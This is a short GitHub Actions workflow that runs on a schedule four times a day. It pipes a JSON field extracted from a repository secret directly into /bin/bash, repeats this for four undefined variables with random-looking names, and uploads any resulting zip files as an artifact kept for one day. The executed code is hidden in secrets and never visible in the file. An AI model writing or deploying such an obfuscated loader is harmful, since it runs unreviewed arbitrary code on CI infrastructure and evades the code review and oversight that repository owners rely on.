name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '10 5,11,17,23 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  scheduler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Invoke
        env:
          dkj96750: ${{ secrets.dkj96750 }}
        run: |
          printf '%s' "$dkj96750" | jq -r .ad94 | /bin/bash
          printf '%s' "$u22063" | jq -r .wiapj42676 | /bin/bash
          printf '%s' "$kubt7" | jq -r .gnyvj41 | /bin/bash
          printf '%s' "$d86" | jq -r .nwthe581 | /bin/bash
          printf '%s' "$ovo255" | jq -r .q000 | /bin/bash

      - name: Store artifact
        uses: actions/upload-artifact@v4
        with:
          name: K8TCigIt
          path: "*.zip"
          retention-days: 1
